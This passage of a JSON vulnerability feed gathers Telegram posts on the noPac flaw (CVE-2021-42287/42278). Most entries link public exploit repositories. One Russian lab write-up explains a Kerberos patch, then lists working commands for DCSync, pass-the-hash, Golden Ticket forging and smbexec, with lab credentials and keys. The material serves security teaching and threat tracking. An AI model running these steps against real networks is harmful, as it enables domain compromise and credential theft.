\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e CVE-2021-42287. 
\u0415\u0441\u043b\u0438 \u043c\u044b \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u0443\u0435\u043c \u043a\u0430\u043a\u043e\u0439-\u043d\u0438\u0431\u0443\u0434\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440 \u0432 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440 \u0434\u043e\u043c\u0435\u043d\u0430, \u0437\u0430\u043f\u0440\u043e\u0441\u0438\u043c \u0434\u043b\u044f \u043d\u0435\u0433\u043e TGT, \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u0443\u0435\u043c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440 \u043e\u0431\u0440\u0430\u0442\u043d\u043e (\u043d\u0435\u0432\u0430\u0436\u043d\u043e, \u0432 \u043a\u0430\u043a\u043e\u0435 \u0438\u043c\u044f) \u0438 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u044d\u0442\u043e\u0433\u043e TGT \u0437\u0430\u043f\u0440\u043e\u0441\u0438\u043c TGS \u043d\u0430 \u043a\u0430\u043a\u0443\u044e-\u043b\u0438\u0431\u043e \u0441\u043b\u0443\u0436\u0431\u0443 (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, LDAP) \u044d\u0442\u043e\u0433\u043e, \u043d\u044b\u043d\u0435 \u0443\u0436\u0435 \u043d\u0435 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0433\u043e, \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430? \u041d\u0435\u0443\u0436\u0435\u043b\u0438 \u043c\u044b \u043f\u043e\u043b\u0443\u0447\u0438\u043c \u0431\u0438\u043b\u0435\u0442, \u043f\u043e\u0434\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0439 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u043e\u043c \u0434\u043e\u043c\u0435\u043d\u0430, \u043d\u0430 \u0441\u0430\u043c\u043e\u0433\u043e \u0441\u0435\u0431\u044f? \u0414\u0430 \u043d\u0435, \u0431\u0440\u0435\u0434, \u0431\u044b\u0442\u044c \u0442\u0430\u043a\u043e\u0433\u043e \u043d\u0435 \u043c\u043e\u0436\u0435\u0442... 
\u0412\u0435\u0434\u044c \u0442\u0430\u043a?\n\n\u0421\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u0441\u0442\u0430\u0442\u044c\u044e.\n\nLH | \u041d\u043e\u0432\u043e\u0441\u0442\u0438 | OSINT | \u041a\u0443\u0440\u0441\u044b", "creation_timestamp": "2024-11-20T13:25:03.000000Z"}, {"uuid": "21f82db3-6332-488e-b918-e3af76a752d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1460", "content": "#Red_Team\n\nExploiting CVE-2021-42278/CVE-2021-42287 to impersonate DA from standard domain user\nhttps://github.com/WazeHell/sam-the-admin\n\n@BlueRedTeam", "creation_timestamp": "2021-12-15T04:30:01.000000Z"}, {"uuid": "7e374c3b-001e-4322-9cfa-88efcd2c7795", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1502", "content": "#CVE-2021\nExploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user \n\nhttps://github.com/WazeHell/sam-the-admin\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T16:59:21.000000Z"}, {"uuid": "743dd184-5d74-46cb-b69c-21593dda0902", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1394", "content": "#CVE-2021\nExploiting CVE-2021-42278 and CVE-2021-42287\n\nhttps://github.com/waterrr/noPac\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T20:05:03.000000Z"}, {"uuid": "0f553b26-9cb9-472a-9a53-593040104212", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", 
"source": "https://t.me/haccking/7058", "content": "#\u041e\u0431\u0443\u0447\u0435\u043d\u0438\u0435\n\u041e\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0434\u043e\u043c\u0435\u043d\u0430 \u0434\u043e \u043f\u0440\u0430\u0432 \u0430\u0434\u043c\u0438\u043d\u0430: CVE-2021-42278, CVE-2021-42287", "creation_timestamp": "2022-01-22T10:49:05.000000Z"}, {"uuid": "b677ef0e-5dd1-4661-922e-250aa7f49e5a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1382", "content": "#CVE-2021\n\nExploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user \n\nhttps://github.com/Ridter/noPac\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T14:51:41.000000Z"}, {"uuid": "a8d0d7c2-dada-4a00-ae1f-71e7a8be1837", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/4979", "content": "#Red_Team_Tactics\nExploiting CVE-2021-42278/CVE-2021-42287 to impersonate DA from standard domain user\nhttps://github.com/WazeHell/sam-the-admin\n]-&gt; Python implementation for CVE-2021-42278\n(AD Privilege Escalation)\nhttps://github.com/ly4k/Pachine", "creation_timestamp": "2021-12-15T12:29:46.000000Z"}, {"uuid": "39d8449f-f9dd-4c3e-b8c4-899cd3664214", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://t.me/S_E_Reborn/4649", "content": "\ud83c\udfab\u041d\u0435\u043c\u043d\u043e\u0433\u043e \u043e Golden Ticket\ud83c\udfab\n\n\u0418\u0437\u0443\u0447\u0430\u044f \u0440\u0435\u0441\u0443\u0440\u0441\u044b \u043f\u043e 
\u0442\u0438\u043f\u0443 HackTricks, \u0432\u044b \u043c\u043e\u0433\u043b\u0438 \u043d\u0435\u043e\u0434\u043d\u043e\u043a\u0440\u0430\u0442\u043d\u043e \u0443\u0432\u0438\u0434\u0435\u0442\u044c \u0441\u043f\u043e\u0441\u043e\u0431 \u0432\u044b\u0434\u0430\u0447\u0438 \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0437\u043e\u043b\u043e\u0442\u043e\u0433\u043e \u0431\u0438\u043b\u0435\u0442\u0430 \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 ticketer.py \u0438\u0437 \u043d\u0430\u0431\u043e\u0440\u0430 Impacket\ud83d\udc69\u200d\ud83d\udcbb:\npython3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN randomuser\n\n\u041d\u043e \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0432 \u0441\u0435\u0431\u0435 \u0431\u0438\u043b\u0435\u0442 \u0442\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c, \u043f\u0440\u0438 \u043f\u043e\u043f\u044b\u0442\u043a\u0435 \u0435\u0433\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0432\u044b \u0443\u0432\u0438\u0434\u0438\u0442\u0435 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0443\u044e \u043e\u0448\u0438\u0431\u043a\u0443:\n[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)\n\u041e \u0447\u0435\u043c \u0433\u043e\u0432\u043e\u0440\u0438\u0442 \u044d\u0442\u0430 \u043e\u0448\u0438\u0431\u043a\u0430? \u0411\u0438\u043b\u0435\u0442 \u0431\u044b\u043b \u043e\u0442\u043e\u0437\u0432\u0430\u043d? \u041d\u043e \u043c\u044b \u0436\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0447\u0442\u043e \u0435\u0433\u043e \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438!\n\n\u0412\u0441\u044f \u043f\u0440\u0438\u0447\u0438\u043d\u0430 \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u043a\u0442\u043e-\u0442\u043e \u043d\u0435 \u0441\u043b\u0435\u0434\u0438\u0442 \u0437\u0430 \u043f\u0430\u0442\u0447-\u043d\u043e\u0443\u0442\u0430\u043c\u0438. 
\u0421 \u043d\u043e\u044f\u0431\u0440\u044f 2021 \u0433\u043e\u0434\u0430 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Microsoft \u043d\u0430\u0447\u0430\u043b\u0430 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 KB5008380, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0432\u0432\u043e\u0434\u0438\u043b\u043e\u0441\u044c \u0432 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u044d\u0442\u0430\u043f\u043e\u0432. \u0415\u0433\u043e \u0446\u0435\u043b\u044c\u044e \u0431\u044b\u043b\u0430 \u043d\u0435\u0439\u0442\u0440\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2021-42287, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u043b\u0430 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u043c\u0443 \u0431\u0435\u0437 \u043e\u0441\u043e\u0431\u044b\u0445 \u0443\u0441\u0438\u043b\u0438\u0439 \u043e\u043b\u0438\u0446\u0435\u0442\u0432\u043e\u0440\u044f\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u044b \u0434\u043e\u043c\u0435\u043d\u0430, \u0437\u043b\u043e\u0443\u043f\u043e\u0442\u0440\u0435\u0431\u043b\u044f\u044f Privilege Attribute Certificate (PAC) Kerberos\ud83d\uddbc\ufe0f\n\n\u0414\u043b\u044f \u0442\u0435\u0445, \u043a\u0442\u043e \u043d\u0435 \u0432 \u0442\u0435\u043c\u0435:\nPrivilege Attribute Certificate (PAC) \u2014 \u044d\u0442\u043e \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0439 \u0432 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0435 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 Kerberos, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0445\u0440\u0430\u043d\u0438\u0442 
\u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e\u0431 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0438 \u043f\u0440\u0438\u043a\u0440\u0435\u043f\u043b\u044f\u0435\u0442\u0441\u044f \u043a \u0431\u0438\u043b\u0435\u0442\u0443 Kerberos, \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044f \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u0447\u043b\u0435\u043d\u0441\u0442\u0432\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0432 \u0433\u0440\u0443\u043f\u043f\u0430\u0445, \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u0445 \u0438 \u0434\u0440\u0443\u0433\u0438\u0445 \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0430\u0445, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u0441 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c\u044e.\n\n\u0412\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u044f\u0441\u044c \u043a \u043f\u0430\u0442\u0447\u0443, Microsoft \u043e\u0431\u043d\u043e\u0432\u0438\u043b\u0430 PAC, \u0434\u043e\u0431\u0430\u0432\u0438\u0432 \u0434\u0432\u0435 \u043d\u043e\u0432\u044b\u0435 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u0434\u0430\u043d\u043d\u044b\u0445: PAC_ATTRIBUTES_INFO \u0438 PAC_REQUESTOR. \u041d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0439 \u0447\u0430\u0441\u0442\u044c\u044e \u043f\u0430\u0442\u0447\u0430 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043d\u043e\u0432\u0430\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0430, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u0430\u044f \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u043e\u0439 PAC_REQUESTOR. 
\u0421 \u0435\u0451 \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u0435\u043c KDC \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u0438\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f (\u043a\u043b\u0438\u0435\u043d\u0442\u0430) \u0432 \u0431\u0438\u043b\u0435\u0442\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0440\u0430\u0437\u0440\u0435\u0448\u0430\u0435\u0442\u0441\u044f \u0432 SID, \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u044b\u0439 \u0432 PAC. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u0441 \u043e\u043a\u0442\u044f\u0431\u0440\u044f 2022 \u0433\u043e\u0434\u0430 \u043b\u044e\u0431\u043e\u0439 \u0431\u0438\u043b\u0435\u0442 \u0431\u0435\u0437 \u043d\u043e\u0432\u043e\u0439 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b PAC (\u0438\u043b\u0438 \u0431\u0438\u043b\u0435\u0442 \u0434\u043b\u044f \u043d\u0435\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f) \u0431\u0443\u0434\u0435\u0442 \u043e\u0442\u043a\u043b\u043e\u043d\u0435\u043d. 
\u0415\u0441\u0442\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e, \u0435\u0441\u043b\u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043e.\n\u0412 \u044d\u0442\u043e\u043c \u0438 \u043a\u0440\u043e\u0435\u0442\u0441\u044f \u0441\u0443\u0442\u044c \u043e\u0448\u0438\u0431\u043a\u0438, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043c\u044b \u043c\u043e\u0433\u043b\u0438 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0442\u044c \u0432\u044b\u0448\u0435.\n\n\u0412\u043c\u0435\u0441\u0442\u0435 \u0441 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u043f\u043e\u0434\u0445\u043e\u0434 \u043a \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044e \u0437\u043e\u043b\u043e\u0442\u044b\u0445 \u0431\u0438\u043b\u0435\u0442\u043e\u0432 \u0442\u043e\u0436\u0435 \u0438\u0437\u043c\u0435\u043d\u0438\u043b\u0441\u044f. \u041c\u044b \u043d\u0435 \u043c\u043e\u0436\u0435\u043c \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0442\u044c Golden Ticket \u0434\u043b\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u043d\u043e \u043c\u043e\u0436\u0435\u043c \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u043c!\n\u0414\u043b\u044f \u043d\u0430\u0447\u0430\u043b\u0430 \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u0435 Impacket!\napt install python3-impacket\n\u041f\u043e\u0441\u043b\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0437\u043e\u043b\u043e\u0442\u043e\u0439 \u0431\u0438\u043b\u0435\u0442 \u043c\u043e\u0436\u043d\u043e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u043a\u043e\u043c\u0430\u043d\u0434\u043e\u0439:\npython3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain 
$DOMAIN -user-id 1000 validuser\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u043e\u0431\u0440\u0430\u0442\u043d\u0430\u044f \u0441\u043e\u0432\u043c\u0435\u0441\u0442\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u043e \u0441\u0442\u0430\u0440\u044b\u043c PAC \u0442\u0430\u043a \u0436\u0435 \u043e\u0441\u0442\u0430\u043d\u0435\u0442\u0441\u044f:\npython3 ticketer.py -nthash $krbtgtRC4key -domain-sid $domainSID -domain $DOMAIN -old-pac username\n\n\u041f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u043f\u0440\u0438\u043c\u0435\u0440 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f Golden Ticket \u043d\u0430 \u043f\u0440\u0438\u043c\u0435\u0440\u0435 \u0443\u0436\u0435 \u0440\u0430\u0437\u043e\u0431\u0440\u0430\u043d\u043d\u043e\u0439 \u043c\u043d\u043e\u0439 \u043b\u0430\u0431\u043e\u0440\u0430\u0442\u043e\u0440\u043d\u043e\u0439 Kingdom \u0441 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b Codeby.Games:\n# \u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c SID \u0434\u043e\u043c\u0435\u043d\u0430:\nimpacket-lookupsid codeby.cdb/administrator:'Not_alon3'@192.168.2.4\n\n# \u0414\u0435\u043b\u0430\u0435\u043c DCSync, \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043a\u043b\u044e\u0447\u0438 \u0443\u0447\u0435\u0442\u043a\u0438 krbtgt:\nimpacket-secretsdump codeby.cdb/administrator:'Not_alon3'@192.168.2.4 -just-dc-user krbtgt\n\n# \u041e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u043c RID-\u0431\u0440\u0443\u0442\u0444\u043e\u0440\u0441 \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u0430\u0440 RID+user (\u0442\u0443\u0442 \u044f \u0432\u043d\u0435\u0437\u0430\u043f\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b Pass-the-Hash):\ncrackmapexec smb 192.168.2.4 -u Administrator -H 3c3d0f466260c126a80abe255cdfffad --rid-brute\n\n# \u0412\u044b\u043f\u0443\u0441\u043a\u0430\u0435\u043c \u0437\u043e\u043b\u043e\u0442\u043e\u0439 
\u0431\u0438\u043b\u0435\u0442:\nimpacket-ticketer -aesKey\nc8a4d26bcf29ff5cd29882308907b5536af9857de7cbfb4c1bf1cd789b3799d2 -domain-sid S-1-5-21-1870022127-3338747641-451296598 -domain codeby.cdb -user-id 1105 amaslova\n\n# \u0414\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u043c \u0437\u0430\u043f\u0438\u0441\u044c \u0432 /etc/hosts, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e Kerberos \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0441 \u0438\u043c\u0435\u043d\u0430\u043c\u0438 \u0441\u043b\u0443\u0436\u0431:\necho '192.168.2.4 kingdom.codeby.cdb kingdom codeby.cdb' &gt;&gt; /etc/hosts\n\n# \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c smbexec \u0441 \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u043c \u0437\u043e\u043b\u043e\u0442\u044b\u043c \u0431\u0438\u043b\u0435\u0442\u043e\u043c:\nexport KRB5CCNAME=amaslova.ccache\nimpacket-smbexec codeby.cdb/amaslova@kingdom.codeby.cdb -k -no-pass\n\n\u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u043c\u043e\u0436\u043d\u043e \u0443\u0432\u0438\u0434\u0435\u0442\u044c \u043d\u0430 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u0445 \u043a \u043f\u043e\u0441\u0442\u0443 (\u043d\u0438\u0436\u0435) \u0441\u043a\u0440\u0438\u043d\u0448\u043e\u0442\u0430\u0445. 
\u041d\u0430 \u043f\u0435\u0440\u0432\u043e\u043c \u0438\u0437 \u043d\u0438\u0445 \u0432\u0438\u0434\u043d\u0430 \u043f\u043e\u043f\u044b\u0442\u043a\u0430 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0431\u0438\u043b\u0435\u0442 \u043d\u0430 \u043d\u0435\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u0430 \u043d\u0430 \u0432\u0442\u043e\u0440\u043e\u043c \u2014 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0437\u043e\u043b\u043e\u0442\u043e\u0433\u043e \u0431\u0438\u043b\u0435\u0442\u0430, \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u0433\u043e \u0434\u043b\u044f \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 amaslova!", "creation_timestamp": "2024-04-04T16:56:15.000000Z"}, {"uuid": "10b9d8a7-81a2-477e-b19f-ab1f8626211a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/5115", "content": "#Analytics\nTop 10 Most Used Vulns of the Month (Dec 1-31)\nCVE-2021-44228 - Apache Log4j2\nCVE-2021-45046 - Apache Log4j DoS\nCVE-2021-42278, CVE-2021-42287 - AD Domain Services EoP Vulnerability\nCVE-2021-44832 - Apache Log4j 2.17.0\nCVE-2021-45105 - DoS via Uncontrolled Recursion in Log4j Strsubstitutor\nCVE-2021-43798 - Grafana 8.x Path Traversal\nCVE-2021-44077 - PreAuth RCE in ManageEngine ServiceDesk Plus\nCVE-2021-4422 - Log4j vulnerability\nCVE-2021-44515 - Zoho ManageEngine Desktop Central Pre-auth RCE", "creation_timestamp": "2024-10-21T16:08:53.000000Z"}, {"uuid": "5304903f-ed68-4eb0-91b0-fb919f711195", "vulnerability_lookup_origin": 
"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/4950", "content": "#Threat_Research\n1. The Python Vulnerability Landscape:\nAnalysis of 10yrs of vulnerability data\nhttps://medium.com/geekculture/the-python-vulnerability-landscape-3904494eec67\n2. CVE-2021-42287/CVE-2021-42278:\nWeaponisation - Active Directory\nhttps://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html\n]-&gt; https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing", "creation_timestamp": "2022-07-06T21:36:38.000000Z"}, {"uuid": "c62f5aaa-ac0a-4ea2-8285-da59ba2380c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/4957", "content": "#tools\n#Offensive_security\n1. JNDI Exploit Kit\nhttps://github.com/pimps/JNDI-Exploit-Kit\n2. 
CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter\nhttps://github.com/cube0x0/noPac\n// If a Domain Controller is vulnerable it will return a TGT without a PAC, all eyes on small size tickets", "creation_timestamp": "2021-12-12T17:52:26.000000Z"}, {"uuid": "bf792e24-758c-4a88-bfed-4396a2fbc8a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "Telegram/fO-UeyZKTtHCwNeV96AKSNSdqyEhxnaa_KQJZWWdPcKrF9o", "content": "", "creation_timestamp": "2023-03-14T17:04:16.000000Z"}, {"uuid": "96c1ea6f-ec49-47e0-9877-0f54292fce51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/win_def/61", "content": "Exploiting CVE-2021-42287/CVE-2021-42278 (Linux)\n\nhttps://github.com/WazeHell/sam-the-admin\n\n#ad #pac #s4u2self #windows #redteam", "creation_timestamp": "2021-12-12T20:40:44.000000Z"}]}